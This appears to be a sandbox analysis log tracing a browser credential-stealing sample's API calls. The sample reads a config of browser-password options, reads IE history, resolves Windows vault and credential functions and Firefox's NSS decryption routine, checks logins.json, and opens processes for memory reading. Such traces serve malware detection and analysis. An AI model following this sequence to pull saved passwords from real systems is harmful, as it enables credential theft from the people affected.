| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018080120180802\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x75cd71c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x75c9b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x75cd7941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x75cd7381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x75cd7481 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x66b10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x66b1526c |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x66ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x66ae26a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x66ae2718 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x66ae3099 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x66ae4321 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetInformation, address_out = 0x66ae24c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x66ae3242 |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite, type = time |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x63120000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x631dd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x631dd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x63173c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x63173333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6315cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6315d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x631700a7 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\sqlite3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\mozsqlite3.dll, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x63120000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x63281ca0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x6320ce70 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x63275200 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x6322d400 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x6322d3a0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x6322d3d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x63259f60 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x6325bde0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x6325a270 |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Open Key | reg_name = Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x63120000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x631dd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x631dd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x63173c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x63173333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6315cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6315d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x631700a7 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcessTimes, address_out = 0x7779f626 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\Sea Monkey\nss3.dll, type = file_attributes |
|
1 | |
